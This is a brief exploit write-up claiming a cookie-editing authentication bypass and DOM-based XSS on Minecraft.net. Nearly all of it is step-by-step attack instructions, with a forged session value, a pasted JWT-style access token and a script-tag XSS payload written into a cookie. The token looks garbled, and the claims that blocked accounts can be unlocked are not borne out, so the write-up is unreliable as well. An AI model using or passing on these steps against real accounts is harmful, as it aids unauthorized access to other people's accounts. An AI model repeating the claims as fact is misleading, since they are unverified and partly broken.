Minecraft.net Xss & bypass

1. =========================================================================================================================
2. Founded By N
3. This Is Dom-Based XSS So {Client Side}
4. Also A Bypass to Get ur Account Unlocked
5. =========================================================================================================================
6. To Preform This Vuln U Will Need a Minecraft Account Even One that is Blocked with sec answers
7. Example: https://imgur.com/iKyP1GH
8. Now Login to ur Mine-craft account it
9. Now Open inspect Element Now go to Ur Cookie's and u should see ur *********@gmail.com Under Then Name Session_user
10. Now Edit The Value Of The User and set it to this {0568tx6RNOWCRzu8OC9zIc37snwC08QkFkjTOH7-Wi4WS6_L560KgA==}
11. This Cookie Was Generated By Magic-Cokkie's on Exploit DB
12. Now Once That Has Changed To Bypass the auth U need To Do is find the cookie id that's named access_token=
13. Then Edit the Value And This {{%22user%22:{%22id%22:%22810346e38c87024d03b433443bf51502f6&%22}%2C%22accessToken%22:%22eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiI4MTA2ZTM4Yzg3MDI0ZDAzYmJmNTE1MDJmNmZhOWE5YyIsIm5iZiI6MTU3Mjg4NzM3NywieWdndCI6ImE2OGIzM2JiYzkzZjRlM2FhOGEwOTI1NTg3Y2Y4ZjFlIiwicm9sZXMiOltdLCJpc3M((&&bnRlcm5hbC1hdXRoZW50aWNhdGlvbiIsImV4cCI6MTU3MzA2MDE3NywiaWF0IjoxNTcyODg3Mzc3fQ.qdoLb2OyLvUsRvXweAb4XRoy4ARxXYsTagcKIKuvvSM%22%2C%22clientToken:[]}
14. Now Reload the Page then it should bypass the Auth And Change ur username to that token One that has been Complete
15. Edit the Value to the Session_User= to this {<script>alert(222)</script>} Then Click Skins then Relmes then Billing info
16. then click Back to minecraft.net
17. Once Preformed it should Have a XSS pop up like this
18. EXAMPLE : https://imgur.com/a/f4Tghxz
19. Boom XSS and ur Have Bypassed Auth
20.  
21. This Vuln Has Been Set To Microsoft Founder Of This Vuln Is Nano
22.  
23. @Copyright 2019 All Rights reserved